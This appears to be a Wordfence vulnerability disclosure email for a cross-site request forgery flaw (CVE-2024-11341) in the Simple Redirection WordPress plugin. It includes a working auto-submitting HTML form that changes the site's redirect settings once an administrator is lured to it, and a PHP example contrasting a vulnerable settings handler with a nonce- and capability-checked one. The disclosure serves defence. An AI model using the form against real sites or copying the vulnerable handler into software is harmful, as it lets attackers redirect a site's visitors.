Cross-Site Request Forgery to Arbitrary Site Redirect
Hello,
We have a new vulnerability in the Simple Redirection plugin to responsibly disclose to you, and the details are outlined below.
Please note that this issue was discovered and responsibly reported to us by SOPROBRO. Any credit for the discovery of the vulnerability should be granted to them.
- Vulnerability Title: Simple Redirection <= 1.5 - Cross-Site Request Forgery to Arbitrary Site Redirect
- CVE ID: CVE-2024-11341
- CVSS Severity Score: 4.3 (Medium)
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
- Organization: Wordfence
- Vulnerability Researcher(s): SOPROBRO
- Software Link(s): https://wordpress.org/plugins/eelv-redirection
Description
The Simple Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings_page() function, so a POST to the plugin's settings page is accepted whether or not it originated from the plugin's own form. This makes it possible for unauthenticated attackers to update the plugin's settings and redirect all site visitors to an arbitrary site via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link while logged in.
Proof of Concept
Make a logged-in admin click a link to an attacker-controlled page containing the following HTML (replace {domain} with the target site). The form submits itself on page load; no further interaction is required.
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Auto-Submitting Form</title>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            var form = document.getElementById('autoForm');
            if (form) {
                // Check if requestSubmit is available, otherwise fall back to submit
                if (typeof form.requestSubmit === 'function') {
                    setTimeout(() => form.requestSubmit(), 500); // Delay for clarity
                } else {
                    setTimeout(() => form.submit(), 500);
                }
            }
        });
    </script>
</head>
<body>
    <!-- Cross-origin POST to the plugin's settings page; the victim's admin
         session cookie is attached by the browser and no nonce is checked -->
    <form id="autoForm" action="http://{domain}/wp-admin/options-general.php?page=eelv_redirection" method="POST">
        <input type="hidden" name="eelv_when_redirect" value='0' />
        <input type="hidden" name="eelv_code_redirect" value='302' />
        <input type="hidden" name="eelv_url_redirect" value='http://google.com' />
        <input type="hidden" name="submit" value='Save Changes' />
        <input type="hidden" name="Submit" value="Submit" />
    </form>
</body>
</html>
Any Known Public References
https://plugins.trac.wordpress.org/browser/eelv-redirection/trunk/eelv_redirection.php#L85
Recommended Solution
We recommend adding nonce verification to any function that performs operations that modify data (such as settings), and requiring that the user initiating the request is authorized to make that request. You may use a nonce verification function such as wp_verify_nonce(), check_ajax_referer(), or check_admin_referer(), paired with a matching wp_nonce_field() in the settings form. Note that a valid nonce only demonstrates that the request came from the plugin's own form for that user; it is not an authorization check, so a capability check such as current_user_can('manage_options') should still be performed before saving. More information about nonce protection can be found at: https://developer.wordpress.org/apis/security/nonces/
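The following is an added illustration written for this report, not the Simple Redirection plugin's own code. It shows the shape of a WordPress settings handler that accepts any POST (the pattern described in the Description above) next to a hardened version that verifies a nonce and a capability before saving. The function names, the nonce action/field names and the stored option names are assumptions for the example; only the POST field names are taken from the proof of concept.

```php
<?php
// Added example, not the plugin's code. Function names, nonce action/field
// names and option names below are assumed for illustration.

// VULNERABLE pattern: any POST that reaches the settings page updates the
// options. A forged cross-site form submitted by a logged-in administrator
// is accepted because nothing ties the request to the plugin's own form.
function eelv_example_settings_page_vulnerable() {
    if ( isset( $_POST['submit'] ) ) {
        update_option( 'eelv_when_redirect', $_POST['eelv_when_redirect'] );
        update_option( 'eelv_code_redirect', $_POST['eelv_code_redirect'] );
        update_option( 'eelv_url_redirect',  $_POST['eelv_url_redirect'] );
    }
    eelv_example_render_form( false );
}

// HARDENED pattern: the form carries a nonce bound to this action and the
// current user; the handler refuses the request unless the nonce verifies
// AND the user holds the capability required to change site options.
function eelv_example_settings_page_hardened() {
    if ( isset( $_POST['submit'] ) ) {
        // Dies with the "link has expired" page when the nonce is missing,
        // stale, or was issued for a different user or action.
        check_admin_referer( 'eelv_example_save_settings', 'eelv_example_nonce' );

        // A valid nonce proves intent, not authorization: still check capability.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( esc_html__( 'You are not allowed to change these settings.' ) );
        }

        // Sanitize and constrain each value before persisting it.
        $when = absint( $_POST['eelv_when_redirect'] ?? 0 );
        $code = (int) ( $_POST['eelv_code_redirect'] ?? 302 );
        if ( ! in_array( $code, array( 301, 302, 307, 308 ), true ) ) {
            $code = 302;
        }
        $url = esc_url_raw( wp_unslash( $_POST['eelv_url_redirect'] ?? '' ) );

        update_option( 'eelv_when_redirect', $when );
        update_option( 'eelv_code_redirect', $code );
        update_option( 'eelv_url_redirect',  $url );
    }
    eelv_example_render_form( true );
}

// Renders the settings form; with $with_nonce the hidden nonce field that the
// hardened handler expects is emitted alongside the inputs.
function eelv_example_render_form( $with_nonce ) {
    echo '<form method="post">';
    if ( $with_nonce ) {
        // Emits hidden fields eelv_example_nonce and _wp_http_referer.
        wp_nonce_field( 'eelv_example_save_settings', 'eelv_example_nonce' );
    }
    printf(
        '<input type="text" name="eelv_url_redirect" value="%s" />',
        esc_attr( get_option( 'eelv_url_redirect', '' ) )
    );
    printf(
        '<input type="number" name="eelv_code_redirect" value="%d" />',
        (int) get_option( 'eelv_code_redirect', 302 )
    );
    printf(
        '<input type="number" name="eelv_when_redirect" value="%d" />',
        (int) get_option( 'eelv_when_redirect', 0 )
    );
    submit_button( 'Save Changes' );
    echo '</form>';
}
```

Against the hardened handler the proof-of-concept form above fails at check_admin_referer(), since the attacker cannot obtain a nonce minted for the victim's session; the capability check additionally stops any lower-privileged user who can reach the page from saving a redirect.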
As per our standard disclosure process, we may notify our customers and the general public about this vulnerability according to the timeline outlined here: https://www.wordfence.com/security/. We may confidentially notify interested parties both inside and outside our organization before the announcement date. To avoid an accelerated disclosure timeline, please acknowledge receipt of this report within 14 days.
You should be aware that other researchers may independently discover this vulnerability and announce it prematurely. You should also note that this vulnerability may be exploited in the wild already. For these reasons we encourage you to release a fix as soon as possible to help protect your customers.
As a courtesy we ask that you notify us as soon as you release a fix to your customers. Please let me know if you have any questions.